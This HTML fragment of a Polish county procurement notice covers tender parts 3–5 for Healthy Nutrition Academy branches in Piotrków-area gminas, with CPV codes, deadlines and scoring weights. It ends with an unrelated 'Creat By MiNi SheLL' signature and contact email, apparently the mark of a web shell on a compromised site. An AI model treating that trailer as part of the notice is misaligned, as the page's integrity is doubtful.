</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> 10 Akademii Zdrowego Żywienia na terenie gminy Moszczenica.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Część nr III - 10 AZŻ na terenie gminy Moszczenica.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> 8 Akademii Zdrowego Żywienia na terenie gmin: Gorzkowice, Ręczno, Łęki Szlacheckie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.: Twoje Serce Twoim Życiem - Część nr IV - 8 AZŻ na terenie gmin: Gorzkowice, Ręczno, Łęki Szlacheckie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> 12 Akademii  Zdrowego Żywienia na terenie gmin: Wola Krzysztoporska, Rozprza.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Uruchomienie i prowadzenie na terenie powiatu piotrkowskiego 50 filii Akademii Zdrowego Żywienia na potrzeby realizacji przez Powiat Piotrkowski projektu pn.:  Twoje Serce Twoim Życiem - Część nr V - 12 AZŻ na terenie gmin: Wola Krzysztoporska, Rozprza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Wartość merytoryczna - 40</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com